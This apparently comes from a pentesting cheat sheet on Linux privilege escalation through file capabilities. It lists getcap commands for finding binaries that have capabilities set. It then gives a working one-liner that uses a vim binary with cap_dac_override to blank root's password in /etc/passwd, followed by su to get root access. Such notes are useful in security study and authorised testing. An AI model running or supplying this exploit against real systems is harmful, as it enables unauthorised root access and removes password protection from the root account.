Capabilities

To find capabilities:

getcap -r / 2>/dev/null

To find:

find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;

To exploit cap_dac_override:

For example if it is vim:

getcap /usr/bin/vim.basic

/usr/bin/vim.basic cap_dac_override=eip

Because the binary has the cap_dac_override capability set, it can escalate the privileges of the user who runs it.

A system file can be modified with this capability. Modifying the root user in /etc/passwd allows for login without password.

echo -e ':%s/^root:[^:]*:/root::/\nwq!' | /usr/bin/vim.basic -es /etc/passwd

for non interactive method.

Then use su to get root access.

Last updated 1 year ago